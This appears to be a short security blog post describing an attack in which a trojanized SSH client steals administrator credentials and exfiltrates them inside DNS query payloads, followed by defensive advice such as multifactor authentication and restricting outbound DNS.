720-891-1663
The bad guys have two problems (well, at least two). The first one is how to get into your system. If the news is any indication, that doesn’t seem to be that hard. The second is getting the data that they want out, undetected.
For organizations that have a Security Information and Event Management (SIEM) solution or a Data Loss Prevention (DLP) system, it is getting harder to sneak the data out. But fear not, hackers are creative.
As of last month hackers are getting in and dropping an infected Secure Shell client on the system (this is a pretty normal attack). When the admin logs into a remote system with this malicious software, the software captures the user’s credentials.
Here is the new part. These credentials are exfiltrated out of the hacked system, inside the payload of a DNS query. DNS is pretty flexible and the payload inside the query can be variable. If all you are exporting is user credentials, that is pretty easy.
Up until today this particular strain of attack was not detected by the AV vendors. Today a small group is detecting it, but, there are a million variations to the scheme. Now that the IDEA is known, you could have a new variant every day.
Multifactor authentication for ALL logins to EVERY system makes this attack less useful, but as long as there are some systems that do not use MFA, that data can be stolen. This would include MFA to all web sites.
You could also block all DNS queries going outside your network except from an internal DNS resolver, but that will not stop the attack if the company laptop is at home or at a local coffee shop and I am not even sure it will stop this attack completely.
This attack is not suitable to steal large quantities of data, but for small amounts of data like login credentials, credit cards, socials, bank accounts and the like, it is definitely workable. Source: Alert Logic.